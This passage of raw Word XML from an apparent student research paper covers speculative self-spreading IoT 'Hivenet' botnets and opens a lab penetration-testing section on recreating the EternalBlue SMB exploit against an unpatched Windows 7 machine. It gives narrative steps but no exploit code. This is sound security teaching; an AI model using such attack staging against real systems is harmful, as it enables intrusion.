      <w:r w:rsidR="008366B4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008366B4">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="008366B4">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"URL":"https://blogs.cisco.com/enterprise/a-guide-for-encrypted-traffic-analytics","abstract":"gartner","accessed":{"date-parts":[["2019","5","2"]]},"author":[{"dropping-particle":"","family":"Liu","given":"Jason","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"cisco.com","id":"ITEM-1","issued":{"date-parts":[["2017"]]},"page":"1","title":"A Guide for Encrypted Malware Traffic Analytics","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=a33046de-dbc5-3e10-a945-715f29efc221"]}],"mendeley":{"formattedCitation":"[66]","plainTextFormattedCitation":"[66]","previouslyFormattedCitation":"[66]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="008366B4">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="008366B4" w:rsidRPr="008366B4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[66]</w:t>
      </w:r>
      <w:r w:rsidR="008366B4">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1C1B91" w14:textId="77777777" w:rsidR="0020770E" w:rsidRPr="0020770E" w:rsidRDefault="0020770E" w:rsidP="007B1930">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DAB525A" w14:textId="15614538" w:rsidR="00696749" w:rsidRDefault="00B62A76" w:rsidP="00696749">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1502D">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Hivene</w:t>
      </w:r>
      <w:r w:rsidR="00980269">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2CE7B5" w14:textId="77777777" w:rsidR="00696749" w:rsidRPr="00696749" w:rsidRDefault="00696749" w:rsidP="00696749">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="034819D8" w14:textId="2340BA56" w:rsidR="00980269" w:rsidRDefault="00B62A76" w:rsidP="009B2D9D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bots will </w:t>
      </w:r>
      <w:r w:rsidR="00A22716">
        <w:t xml:space="preserve">also </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">evolve into </w:t>
      </w:r>
      <w:r w:rsidR="00C55BC5">
        <w:t xml:space="preserve">‘Hivenets’ </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">within </w:t>
      </w:r>
      <w:r w:rsidR="00C55BC5">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 5G advanced IoT </w:t>
      </w:r>
      <w:r w:rsidR="00C55BC5">
        <w:t>M2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">M learning environment if </w:t>
      </w:r>
      <w:r w:rsidR="00D16A07">
        <w:t>the trend within the inefficient and/or non-existent security of the majority of IoT devices remains. If these future advanced IoT M2M learning devices were to be</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D16A07">
        <w:t>exploited within the future, they</w:t>
      </w:r>
      <w:r w:rsidR="009A7A56">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D16A07">
        <w:t xml:space="preserve">will become very </w:t>
      </w:r>
      <w:r w:rsidR="00A22716">
        <w:t>difficult</w:t>
      </w:r>
      <w:r w:rsidR="00D16A07">
        <w:t xml:space="preserve"> to prevent because of the autonomous </w:t>
      </w:r>
      <w:r w:rsidR="00980269">
        <w:t xml:space="preserve">M2M </w:t>
      </w:r>
      <w:r w:rsidR="00D16A07">
        <w:t xml:space="preserve">functionality of </w:t>
      </w:r>
      <w:r w:rsidR="00980269">
        <w:t>future IoT</w:t>
      </w:r>
      <w:r w:rsidR="00D16A07">
        <w:t xml:space="preserve"> devices</w:t>
      </w:r>
      <w:r w:rsidR="00A22716">
        <w:t xml:space="preserve"> and the advent of encrypted malware</w:t>
      </w:r>
      <w:r w:rsidR="00980269">
        <w:t>. To create a Hivenet in an advanced  5G IoT M2M network,</w:t>
      </w:r>
      <w:r w:rsidR="00D16A07">
        <w:t xml:space="preserve"> only one device would need to be infected with ‘Bot’ </w:t>
      </w:r>
      <w:r w:rsidR="00A22716">
        <w:t xml:space="preserve">encrypted </w:t>
      </w:r>
      <w:r w:rsidR="00D16A07">
        <w:t>malware that would then in turn</w:t>
      </w:r>
      <w:r w:rsidR="009A7A56">
        <w:t xml:space="preserve"> autonomously </w:t>
      </w:r>
      <w:r w:rsidR="00D16A07">
        <w:t xml:space="preserve"> infect the rest of the ad</w:t>
      </w:r>
      <w:r w:rsidR="00A22716">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00D16A07">
        <w:t xml:space="preserve">hoc IoT devices </w:t>
      </w:r>
      <w:r w:rsidR="009A7A56">
        <w:t xml:space="preserve">within the 5G network creating a ‘Hivenet’ of </w:t>
      </w:r>
      <w:r w:rsidR="00A22716">
        <w:t xml:space="preserve">semi-AI </w:t>
      </w:r>
      <w:r w:rsidR="009A7A56">
        <w:t xml:space="preserve">bots that can be controlled by a malicious actor </w:t>
      </w:r>
      <w:r w:rsidR="00980269">
        <w:t>or autonomously</w:t>
      </w:r>
      <w:r w:rsidR="009A7A56">
        <w:t xml:space="preserve"> leverage massive DDoS attacks that could transmit terabytes of data to the target servers that current DDoS mitigation tools would not be able to prevent.</w:t>
      </w:r>
      <w:r w:rsidR="00A22716">
        <w:t xml:space="preserve"> An advanced semi-AI </w:t>
      </w:r>
      <w:r w:rsidR="00980269">
        <w:t>Hivenet could</w:t>
      </w:r>
      <w:r w:rsidR="00A22716">
        <w:t xml:space="preserve"> also be programmed by malicious actors to autonomously evade detection </w:t>
      </w:r>
      <w:r w:rsidR="00980269">
        <w:t>by utilising</w:t>
      </w:r>
      <w:r w:rsidR="00A22716">
        <w:t xml:space="preserve"> their </w:t>
      </w:r>
      <w:r w:rsidR="00980269">
        <w:t xml:space="preserve">autonomous semi-AI </w:t>
      </w:r>
      <w:r w:rsidR="00A22716">
        <w:t xml:space="preserve">decision-making functionality making them even more difficult to detect. </w:t>
      </w:r>
      <w:r w:rsidR="008366B4">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="008366B4">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"URL":"https://www.fortinet.com/blog/industry-trends/rise-of-the--hivenet---botnets-that-think-for-themselves.html","abstract":"Hivenet","accessed":{"date-parts":[["2019","5","2"]]},"author":[{"dropping-particle":"","family":"Fortinet","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"fortinet","id":"ITEM-1","issued":{"date-parts":[["2018"]]},"page":"1","title":"Rise of the 'Hivenet': Botnets That Think for Themselves","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=369cb10d-3912-39c6-b041-93fc6ae141fe"]}],"mendeley":{"formattedCitation":"[64]","plainTextFormattedCitation":"[64]","previouslyFormattedCitation":"[64]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="008366B4">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="008366B4" w:rsidRPr="008366B4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[64]</w:t>
      </w:r>
      <w:r w:rsidR="008366B4">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C4FC7A" w14:textId="77777777" w:rsidR="00980269" w:rsidRDefault="00980269" w:rsidP="009B2D9D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31D91C33" w14:textId="77777777" w:rsidR="00A94B2C" w:rsidRDefault="00A22716" w:rsidP="009B2D9D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidR="00980269">
        <w:t>Hivenet</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> could also be further programmed to leverage semi-AI encrypted malware attacks on critical infrastructure that could be taken control by the hacker </w:t>
      </w:r>
      <w:r w:rsidR="00980269">
        <w:t>that governs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the Hivenet that could have catastrophic implications within cyberwarfare</w:t>
      </w:r>
      <w:r w:rsidR="00980269">
        <w:t xml:space="preserve"> and cybersecurity as a whole</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F17CCF7" w14:textId="12827542" w:rsidR="00A22716" w:rsidRDefault="00A22716" w:rsidP="009B2D9D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5180927B" w14:textId="77777777" w:rsidR="00034BD2" w:rsidRPr="00034BD2" w:rsidRDefault="00034BD2" w:rsidP="009B2D9D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B9CC165" w14:textId="20FC2653" w:rsidR="00F1502D" w:rsidRPr="00F1502D" w:rsidRDefault="00F1502D" w:rsidP="009B2D9D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Cybersecurity Future Trends Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F03F24" w14:textId="6A591903" w:rsidR="000105DB" w:rsidRDefault="000105DB" w:rsidP="000105DB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The advancement in </w:t>
      </w:r>
      <w:r w:rsidR="0046613C">
        <w:t>IoT technology</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="0046613C">
        <w:t xml:space="preserve">computer </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">networking is escalating at a </w:t>
      </w:r>
      <w:r w:rsidR="0046613C">
        <w:t>staggering</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> rate with the advent of 5G networking and AI software and also the reliance that society has on these devices</w:t>
      </w:r>
      <w:r w:rsidR="0046613C">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that are </w:t>
      </w:r>
      <w:r w:rsidR="0046613C">
        <w:t xml:space="preserve">weaved into </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">every facet of our lives that will become further integrated </w:t>
      </w:r>
      <w:r w:rsidR="0046613C">
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidR="0046613C">
        <w:t xml:space="preserve">society in </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the near future. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021594FE" w14:textId="77777777" w:rsidR="000105DB" w:rsidRDefault="000105DB" w:rsidP="000105DB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08A45906" w14:textId="72B8C257" w:rsidR="00F1502D" w:rsidRPr="000105DB" w:rsidRDefault="000105DB" w:rsidP="000105DB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Cybersecurity mitigations tools and techniques must become a priority before implementing these future technologies that although in an idealistic world are intended to further evolve mankind and aid within our everyday lives to provide a utopian world</w:t>
      </w:r>
      <w:r w:rsidR="0046613C">
        <w:t xml:space="preserve">. If security is not </w:t>
      </w:r>
      <w:r w:rsidR="0032558A">
        <w:t>efficiently</w:t>
      </w:r>
      <w:r w:rsidR="0046613C">
        <w:t xml:space="preserve"> implemented within the future advanced technologies the intended utopian world could </w:t>
      </w:r>
      <w:r w:rsidR="0032558A">
        <w:t>become</w:t>
      </w:r>
      <w:r w:rsidR="0046613C">
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r w:rsidR="0032558A">
        <w:t>dystopian</w:t>
      </w:r>
      <w:r w:rsidR="0046613C">
        <w:t xml:space="preserve"> world </w:t>
      </w:r>
      <w:r w:rsidR="0032558A">
        <w:t xml:space="preserve">with chaos and disorder. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABBD6D6" w14:textId="77777777" w:rsidR="00E11F62" w:rsidRPr="00E11F62" w:rsidRDefault="00E11F62" w:rsidP="00E11F62">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B28EB66" w14:textId="7F26C689" w:rsidR="00F04738" w:rsidRDefault="00F04738" w:rsidP="002A443D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Hlk6918309"/>
      <w:r>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cybersecurity Practical </w:t>
      </w:r>
      <w:r w:rsidR="003B06E8">
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Research </w:t>
      </w:r>
      <w:r w:rsidR="000F4472">
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="003B06E8">
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Penetration Testing Implementation</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="1"/>
    <w:p w14:paraId="6F995552" w14:textId="77777777" w:rsidR="009A5CB3" w:rsidRPr="009A5CB3" w:rsidRDefault="009A5CB3" w:rsidP="009A5CB3">
      <w:pPr>
        <w:spacing w:line="72" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:smallCaps/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="474FC424" w14:textId="1F0D1E56" w:rsidR="00682DE6" w:rsidRDefault="003B06E8" w:rsidP="003B06E8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="003B06E8">
        <w:t>Within</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> this section of the</w:t>
      </w:r>
      <w:r w:rsidR="00AF66EC">
        <w:t xml:space="preserve"> research</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> paper</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> practical cybersecurity attacks are going to be implemented within a controlled </w:t>
      </w:r>
      <w:r w:rsidR="00682DE6">
        <w:t>‘Sandbox’</w:t>
      </w:r>
      <w:r w:rsidR="008366B4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00682DE6">
        <w:t xml:space="preserve"> tier-2 hypervisor</w:t>
      </w:r>
      <w:r w:rsidR="008366B4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008366B4">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="008366B4">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1007/s11623-012-0012-y","ISSN":"1614-0702","abstract":"A hypervisor or virtual machine monitor (VMM) is a piece of computer software, firmware or hardware that creates and runs virtual machines.\\nA computer on which a hypervisor is running one or more virtual machines is defined as a host machine. Each virtual machine is called a guest machine. The hypervisor presents the guest operating systems with a virtual operating platform and manages the execution of the guest operating systems. Multiple instances of a variety of operating systems may share the virtualized hardware resources.","author":[{"dropping-particle":"","family":"Fox","given":"Dirk","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Datenschutz und Datensicherheit - DuD","id":"ITEM-1","issued":{"date-parts":[["2012"]]},"title":"Hypervisor","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=5bcd4cfd-6c99-4173-bc56-31e2b0a43f7b"]}],"mendeley":{"formattedCitation":"[67]","plainTextFormattedCitation":"[67]","previouslyFormattedCitation":"[67]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="008366B4">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="008366B4" w:rsidRPr="008366B4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[67]</w:t>
      </w:r>
      <w:r w:rsidR="008366B4">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00682DE6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>environment</w:t>
      </w:r>
      <w:r w:rsidR="003A783D">
        <w:t xml:space="preserve"> utilising a penetration testing OS </w:t>
      </w:r>
      <w:r w:rsidR="00213A74">
        <w:t xml:space="preserve">that contains thousands of hacking tools </w:t>
      </w:r>
      <w:r w:rsidR="003A783D">
        <w:t>called ‘Kali’ Linux</w:t>
      </w:r>
      <w:r w:rsidR="008366B4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008366B4">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="008366B4">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"URL":"https://www.kali.org/","accessed":{"date-parts":[["2018","5","23"]]},"author":[{"dropping-particle":"","family":"Offensive-Security","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"kali.org","id":"ITEM-1","issued":{"date-parts":[["2018"]]},"page":"1","title":"Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=84b494af-9875-320b-b28c-22df05c84bdf"]}],"mendeley":{"formattedCitation":"[68]","plainTextFormattedCitation":"[68]","previouslyFormattedCitation":"[68]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="008366B4">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="008366B4" w:rsidRPr="008366B4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[68]</w:t>
      </w:r>
      <w:r w:rsidR="008366B4">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00033508">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00213A74">
        <w:t xml:space="preserve"> this cybersecurity OS is</w:t>
      </w:r>
      <w:r w:rsidR="003A783D">
        <w:t xml:space="preserve"> utilised by security professionals around the glob</w:t>
      </w:r>
      <w:r w:rsidR="00033508">
        <w:t xml:space="preserve">e. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4193477A" w14:textId="77777777" w:rsidR="00682DE6" w:rsidRDefault="00682DE6" w:rsidP="003B06E8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B83F381" w14:textId="2B07CD50" w:rsidR="00213A74" w:rsidRDefault="00682DE6" w:rsidP="003B06E8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Kali Linux will be utilised in the following</w:t>
      </w:r>
      <w:r w:rsidR="003B06E8">
        <w:t xml:space="preserve"> demonstrat</w:t>
      </w:r>
      <w:r>
        <w:t>ions to highlight</w:t>
      </w:r>
      <w:r w:rsidR="003B06E8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AF66EC">
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="003B06E8">
        <w:t xml:space="preserve"> ease in which malicious actors can access computer devices using a combination of </w:t>
      </w:r>
      <w:r w:rsidR="00594CB6">
        <w:t xml:space="preserve">‘Information Gathering’ tools and techniques, </w:t>
      </w:r>
      <w:r w:rsidR="003B06E8">
        <w:t xml:space="preserve">pure remote </w:t>
      </w:r>
      <w:r w:rsidR="00AF66EC">
        <w:t>exploitation</w:t>
      </w:r>
      <w:r w:rsidR="003B06E8">
        <w:t xml:space="preserve"> attack</w:t>
      </w:r>
      <w:r w:rsidR="003A783D">
        <w:t>s such as ‘Eternal Blue’</w:t>
      </w:r>
      <w:r w:rsidR="003B06E8">
        <w:t xml:space="preserve">, social engineering attacks </w:t>
      </w:r>
      <w:r w:rsidR="003A783D">
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r w:rsidR="00033508">
        <w:t xml:space="preserve">are </w:t>
      </w:r>
      <w:r w:rsidR="003A783D">
        <w:t>leveraged against victims to</w:t>
      </w:r>
      <w:r w:rsidR="003B06E8">
        <w:t xml:space="preserve"> gain access to </w:t>
      </w:r>
      <w:r w:rsidR="003A783D">
        <w:t xml:space="preserve">their online </w:t>
      </w:r>
      <w:r w:rsidR="003B06E8">
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidR="003A783D">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="003B06E8">
        <w:t xml:space="preserve"> or take control of a device using a backdoor ‘Trojan Horse’ </w:t>
      </w:r>
      <w:r w:rsidR="003A783D">
        <w:t xml:space="preserve">that’s a form of </w:t>
      </w:r>
      <w:r w:rsidR="003B06E8">
        <w:t xml:space="preserve">malware </w:t>
      </w:r>
      <w:r w:rsidR="00594CB6">
        <w:t>that is installed utilising social engineering ‘</w:t>
      </w:r>
      <w:r w:rsidR="003B06E8">
        <w:t>phishing</w:t>
      </w:r>
      <w:r w:rsidR="00594CB6">
        <w:t>’ E-M</w:t>
      </w:r>
      <w:r w:rsidR="003B06E8">
        <w:t>ails, along with the evasion techniques that cybercriminals used to hide their location and identity.</w:t>
      </w:r>
      <w:r w:rsidR="008366B4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008366B4">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1109/MSP.2009.181","ISSN":"15407993","abstract":"This paper presents the generation of virus emerging from email to cellphones. Most of these early threats were self-replicating but not self-transporting, spreading from computer to computer via infected floppy disks. As more viruses were discovered, most known malware existed only in researchers' collections and not in users' machines. Malware was shift from virus to worm called Trojan horse. And different anti-virus companies deploying new tools to protect users from malware.","author":[{"dropping-particle":"","family":"Ford","given":"Richard","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Allen","given":"William H.","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"IEEE Security and Privacy","id":"ITEM-1","issued":{"date-parts":[["2009"]]},"title":"Malware shall greatly increase</w:instrText>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:instrText>⋯</w:instrText>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:instrText>","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=e5b66ee0-cd59-4874-9450-9c1f88459cb8"]}],"mendeley":{"formattedCitation":"[69]","plainTextFormattedCitation":"[69]","previouslyFormattedCitation":"[69]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="008366B4">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="008366B4" w:rsidRPr="008366B4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[69]</w:t>
      </w:r>
      <w:r w:rsidR="008366B4">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F78F32D" w14:textId="77777777" w:rsidR="003B06E8" w:rsidRPr="003B06E8" w:rsidRDefault="003B06E8" w:rsidP="003B06E8">
      <w:pPr>
        <w:spacing w:line="72" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DEBA251" w14:textId="7D5C5118" w:rsidR="00403E69" w:rsidRDefault="00F04738" w:rsidP="00E862F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remote Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB07A4E" w14:textId="4236F11B" w:rsidR="00EC662B" w:rsidRDefault="00EC662B" w:rsidP="005736B1">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">After reviewing the WannaCry attack within the </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC662B">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Cyberwarfare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> section of this paper. The first stage of the attack was recreated </w:t>
      </w:r>
      <w:r w:rsidR="009F7D88">
        <w:t xml:space="preserve">within a LAN environment </w:t>
      </w:r>
      <w:r>
        <w:t>which is the remote exploitation of the vulnerable SMB port 445 within an unpatched Windows 7 client machine utilising the ‘Eternal Blue’ NSA exploitation code. This penetration test was conducted within a computer laboratory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CC5EA4" w14:textId="77777777" w:rsidR="00571C3F" w:rsidRDefault="00571C3F" w:rsidP="005736B1">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D838051" w14:textId="7B5D87D2" w:rsidR="009F7D88" w:rsidRDefault="009F7D88" w:rsidP="009F7D88">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The First stage of any LAN remote exploitation attack is </w:t>
      </w:r>
      <w:r w:rsidR="00670FF6">
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:t>information gathering</w:t>
      </w:r>
      <w:r w:rsidR="00670FF6">
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, to scan for devices attached to the LAN router that the attacking device is connected to, that have open vulnerable ports and to also fingerprint the OS version that is being utilised to establish if the computer device is vulnerable. The Information Protocol (IP) address of the vulnerable target is also identified at this stage. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB8CBD5" w14:textId="77777777" w:rsidR="009F7D88" w:rsidRDefault="009F7D88" w:rsidP="009F7D88">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="794E14E7" w14:textId="741C20F7" w:rsidR="008E1713" w:rsidRDefault="008E1713" w:rsidP="008E1713">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00670FF6">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> command was first utilised within the Kali Linux CLI to view the IP address of the attacking machine that will be utilised later in the attack and to also identify the sub</w:t>
      </w:r>
      <w:r w:rsidR="00723443">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>net</w:t>
      </w:r>
      <w:r w:rsidR="00723443">
        <w:t>work (Subnet)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> address of the LAN and the gateway (Router) address.</w:t>
      </w:r>
      <w:r w:rsidR="00A94B2C">
